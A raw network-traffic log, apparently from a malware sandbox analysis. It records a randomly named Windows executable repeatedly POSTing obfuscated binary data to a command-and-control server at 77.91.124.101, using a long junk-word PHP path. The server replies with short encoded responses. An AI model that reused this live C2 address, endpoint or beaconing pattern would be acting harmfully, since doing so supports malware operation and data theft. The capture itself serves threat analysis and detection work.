                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:49.267235994 CET | 647 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:49.267549038 CET | 650 | OUT | Data Raw: 57 5b 58 5e 5b 5c 5f 59 5d 57 55 57 55 5e 57 50 50 59 58 42 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X^[\_Y]WUWU^WPPYXBVWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*1^(+9*07;$] 9+3&>:S33%.>?<8.&G''^)+
                                                            Nov 21, 2023 04:48:49.470273018 CET | 650 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            125 | 77.91.124.101 | 80 | 192.168.2.5 | 49840 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:50.064968109 CET | 651 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:50.263237000 CET | 651 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:51.500138998 CET | 654 | OUT | Data Raw: 57 51 58 5f 5b 53 5a 5c 5d 57 55 57 55 59 57 50 50 5a 58 42 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQX_[SZ\]WUWUYWPPZXBVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y)(1(%)#_,$64\)<#"Q0=90.S9;>?'Y-.&G''^)
                                                            Nov 21, 2023 04:48:51.702452898 CET | 655 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:50 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            126 | 77.91.124.101 | 80 | 192.168.2.5 | 49841 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:51.698138952 CET | 655 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:51.894644976 CET656INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:51.895076990 CET657OUTData Raw: 52 5a 58 59 5e 5e 5a 5b 5d 57 55 57 55 58 57 53 50 59 58 44 56 5e 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXY^^Z[]WUWUXWSPYXDV^WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);=^<;-?0#^.$) 9!X(39$-W'.;=</#/>&G''^)?
                                                            Nov 21, 2023 04:48:52.096456051 CET661INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:51 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 00 25 2c 20 58 21 20 2f 57 29 39 29 19 2d 58 39 1a 3c 55 29 5e 31 5b 20 12 27 39 0f 54 3c 01 3c 5d 33 07 30 13 23 50 2c 5b 2a 30 21 5a 0c 1d 26 18 22 38 30 0d 28 10 3f 01 2b 13 28 18 26 1f 2f 14 2b 3e 0e 0c 20 0d 3f 58 25 23 20 1a 38 06 2e 03 2d 28 00 45 25 12 32 5f 37 2d 23 5f 0c 14 27 50 36 0f 0d 5e 20 09 22 56 22 37 16 15 20 0a 28 0e 30 04 28 1c 26 3b 22 05 28 3b 30 57 32 0e 24 50 33 29 33 1d 32 39 01 1c 28 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%, X! /W)9)-X9<U)^1[ '9T<<]30#P,[*0!Z&"80(?+(&/+> ?X%# 8.-(E%2_7-#_'P6^ "V"7 (0(&;"(;0W2$P3)329(*&T*+H6ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
127 | 192.168.2.5 | 49842 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:51.831931114 CET | 656 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:48:52.030527115 CET | 658 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:52.031117916 CET | 660 | OUT | Data Raw: 52 5b 58 50 5b 5c 5f 5e 5d 57 55 57 55 5b 57 53 50 59 58 46 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
Data Ascii: R[XP[\_^]WUWU[WSPYXFV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*<+=U;_,'.^ 2(#-$-.3 19(&(<+->&G''^)3
Nov 21, 2023 04:48:52.234703064 CET | 661 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
128 | 192.168.2.5 | 49843 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:52.554563046 CET | 662 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Nov 21, 2023 04:48:52.759457111 CET | 662 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:52.759687901 CET | 665 | OUT | Data Raw: 52 5a 58 50 5b 5d 5f 5e 5d 57 55 57 55 57 57 52 50 53 58 48 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
Data Ascii: RZXP[]_^]WUWUWWRPSXHVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)^5X?=>30,B6Z :9(9$[='3.,;<8/&G''^)
Nov 21, 2023 04:48:52.963704109 CET | 665 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
129 | 192.168.2.5 | 49844 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:53.289393902 CET | 666 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Nov 21, 2023 04:48:53.486891031 CET | 666 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:53.487193108 CET | 668 | OUT | Data Raw: 52 5c 5d 5b 5e 58 5f 59 5d 57 55 57 55 59 57 5a 50 5d 58 48 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
Data Ascii: R\][^X_Y]WUWUYWZP]XHVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*![?+!?3(85 :9?*R$=*0).+)><;;&G''^)
Nov 21, 2023 04:48:53.689637899 CET | 669 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 77.91.124.101 | 80 | 192.168.2.5 | 49725 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:47:34.678030968 CET | 193 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:47:34.875669003 CET | 193 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:47:34.875929117 CET | 196 | OUT | Data Raw: 52 5b 58 5a 5b 5f 5f 5a 5d 57 55 57 55 59 57 50 50 5f 58 48 56 52 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
Data Ascii: R[XZ[__Z]WUWUYWPP_XHVRW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*6=+T=(/$] 5(3>9$#.V:>_<7;&G''^)
Nov 21, 2023 04:47:35.080408096 CET | 196 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:47:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
130 | 192.168.2.5 | 49845 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:54.002024889 CET | 670 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:48:54.198462009 CET | 670 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:54.198731899 CET | 672 | OUT | Data Raw: 57 51 58 5a 5e 5e 5a 50 5d 57 55 57 55 58 57 53 50 58 58 47 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
Data Ascii: WQXZ^^ZP]WUWUXWSPXXGVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\+8=+2R?#4/$-49+060=$ 9"^>,</&G''^)?
Nov 21, 2023 04:48:54.400331020 CET | 673 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13077.91.124.10180192.168.2.549845C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:54.002024889 CET670OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:54.198462009 CET | 670 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:54.198731899 CET | 672 | OUT | Data Raw: 57 51 58 5a 5e 5e 5a 50 5d 57 55 57 55 58 57 53 50 58 58 47 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQXZ^^ZP]WUWUXWSPXXGVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\+8=+2R?#4/$-49+060=$ 9"^>,</&G''^)?
                                                            Nov 21, 2023 04:48:54.400331020 CET | 673 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            131 | 192.168.2.5 | 49846 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:54.733474016 CET | 673 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:54.930938959 CET | 674 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:54.931238890 CET | 676 | OUT | Data Raw: 57 5e 58 5f 5e 5f 5a 50 5d 57 55 57 55 5f 57 53 50 5a 58 44 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^X_^_ZP]WUWU_WSPZXDVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!?+* #,$)#1+3=13#=,8)??4->&G''^)#
                                                            Nov 21, 2023 04:48:55.134145021 CET | 676 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            132 | 192.168.2.5 | 49847 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:55.457685947 CET | 677 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:55.654196978 CET | 677 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:55.654433966 CET | 680 | OUT | Data Raw: 57 58 58 5a 5b 53 5a 5e 5d 57 55 57 55 59 57 57 50 5c 58 47 56 51 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXXZ[SZ^]WUWUYWWP\XGVQWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=1?=;;$1 :5](#$->P$-,;:Y<(->&G''^)
                                                            Nov 21, 2023 04:48:55.856467009 CET | 680 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:55 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            133 | 192.168.2.5 | 49848 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:56.192643881 CET | 681 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:56.390491009 CET | 681 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:57.889027119 CET | 684 | OUT | Data Raw: 57 5a 58 5c 5e 5d 5f 5e 5d 57 55 57 55 5e 57 51 50 53 58 49 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZX\^]_^]WUWU^WQPSXIVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>+!_+>W=0 82[4*+&R$=>V0V>-;:<$8>&G''^)/
                                                            Nov 21, 2023 04:48:58.091731071 CET | 684 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:56 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            14 | 192.168.2.5 | 49726 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:35.397778988 CET | 197 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:35.594356060 CET | 197 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:35.594820023 CET | 200 | OUT | Data Raw: 52 5d 58 5c 5e 5a 5a 5c 5d 57 55 57 55 58 57 52 50 5b 58 44 56 56 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X\^ZZ\]WUWUXWRP[XDVVW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^!_?(!)0;;7%7:1X< 5$=:& *,+&X+->&G''^)?
                                                            Nov 21, 2023 04:47:35.797945976 CET | 200 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            15 | 192.168.2.5 | 49727 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
